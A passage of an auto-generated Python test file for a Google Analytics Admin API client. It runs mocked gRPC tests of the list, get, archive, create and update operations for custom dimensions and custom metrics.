with pytest.raises(ValueError): await client.list_custom_dimensions( analytics_admin.ListCustomDimensionsRequest(), parent="parent_value", ) def test_list_custom_dimensions_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_custom_dimensions(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.CustomDimension) for i in results) def test_list_custom_dimensions_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) pages = list(client.list_custom_dimensions(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_custom_dimensions_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) async_pager = await client.list_custom_dimensions(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.CustomDimension) for i in responses) @pytest.mark.asyncio async def test_list_custom_dimensions_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_custom_dimensions(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_archive_custom_dimension( transport: str = "grpc", request_type=analytics_admin.ArchiveCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomDimensionRequest() # Establish that the response is the type that we expect. assert response is None def test_archive_custom_dimension_from_dict(): test_archive_custom_dimension(request_type=dict) def test_archive_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. 
request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: client.archive_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomDimensionRequest() @pytest.mark.asyncio async def test_archive_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ArchiveCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomDimensionRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_archive_custom_dimension_async_from_dict(): await test_archive_custom_dimension_async(request_type=dict) def test_archive_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. 
request = analytics_admin.ArchiveCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: call.return_value = None client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_archive_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ArchiveCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_archive_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.archive_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_archive_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.archive_custom_dimension( analytics_admin.ArchiveCustomDimensionRequest(), name="name_value", ) @pytest.mark.asyncio async def test_archive_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.archive_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_archive_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.archive_custom_dimension( analytics_admin.ArchiveCustomDimensionRequest(), name="name_value", ) def test_get_custom_dimension( transport: str = "grpc", request_type=analytics_admin.GetCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) response = client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True def test_get_custom_dimension_from_dict(): test_get_custom_dimension(request_type=dict) def test_get_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. 
client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: client.get_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomDimensionRequest() @pytest.mark.asyncio async def test_get_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) ) response = await client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomDimensionRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True @pytest.mark.asyncio async def test_get_custom_dimension_async_from_dict(): await test_get_custom_dimension_async(request_type=dict) def test_get_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: call.return_value = resources.CustomDimension() client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) await client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_custom_dimension( analytics_admin.GetCustomDimensionRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = resources.CustomDimension() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_custom_dimension( analytics_admin.GetCustomDimensionRequest(), name="name_value", ) def test_create_custom_metric( transport: str = "grpc", request_type=analytics_admin.CreateCustomMetricRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) response = client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT def test_create_custom_metric_from_dict(): test_create_custom_metric(request_type=dict) def test_create_custom_metric_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: client.create_custom_metric() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomMetricRequest() @pytest.mark.asyncio async def test_create_custom_metric_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateCustomMetricRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) ) response = await client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT @pytest.mark.asyncio async def test_create_custom_metric_async_from_dict(): await test_create_custom_metric_async(request_type=dict) def test_create_custom_metric_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateCustomMetricRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: call.return_value = resources.CustomMetric() client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateCustomMetricRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) await client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_custom_metric( parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].custom_metric == resources.CustomMetric(name="name_value") def test_create_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_custom_metric( analytics_admin.CreateCustomMetricRequest(), parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) @pytest.mark.asyncio async def test_create_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_custom_metric( parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].custom_metric == resources.CustomMetric(name="name_value") @pytest.mark.asyncio async def test_create_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.create_custom_metric( analytics_admin.CreateCustomMetricRequest(), parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) def test_update_custom_metric( transport: str = "grpc", request_type=analytics_admin.UpdateCustomMetricRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) response = client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT def test_update_custom_metric_from_dict(): test_update_custom_metric(request_type=dict) def test_update_custom_metric_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. 
request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: client.update_custom_metric() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomMetricRequest() @pytest.mark.asyncio async def test_update_custom_metric_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateCustomMetricRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) ) response = await client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomMetricRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT @pytest.mark.asyncio async def test_update_custom_metric_async_from_dict(): await test_update_custom_metric_async(request_type=dict) def test_update_custom_metric_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomMetricRequest() request.custom_metric.name = "custom_metric.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: call.return_value = resources.CustomMetric() client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_metric.name=custom_metric.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomMetricRequest() request.custom_metric.name = "custom_metric.name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) await client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_metric.name=custom_metric.name/value", ) in kw["metadata"] def test_update_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_custom_metric( custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].custom_metric == resources.CustomMetric(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.update_custom_metric( analytics_admin.UpdateCustomMetricRequest(), custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_custom_metric( custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].custom_metric == resources.CustomMetric(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.update_custom_metric( analytics_admin.UpdateCustomMetricRequest(), custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_custom_metrics( transport: str = "grpc", request_type=analytics_admin.ListCustomMetricsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomMetricsResponse( next_page_token="next_page_token_value", ) response = client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomMetricsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomMetricsPager) assert response.next_page_token == "next_page_token_value" def test_list_custom_metrics_from_dict(): test_list_custom_metrics(request_type=dict) def test_list_custom_metrics_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), 